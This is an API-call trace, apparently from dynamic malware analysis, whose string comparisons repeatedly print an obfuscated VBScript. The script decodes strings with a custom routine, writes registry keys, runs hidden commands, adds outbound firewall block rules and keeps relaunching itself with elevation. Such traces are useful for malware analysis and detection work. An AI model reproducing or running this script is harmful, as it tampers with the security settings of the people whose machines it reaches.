bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 35 [0222.946] wcsncmp (_String1=")\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.947] wcsncmp (_String1="\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -30 [0222.947] wcsncmp (_String1="\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.947] wcsncmp (_String1="\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = 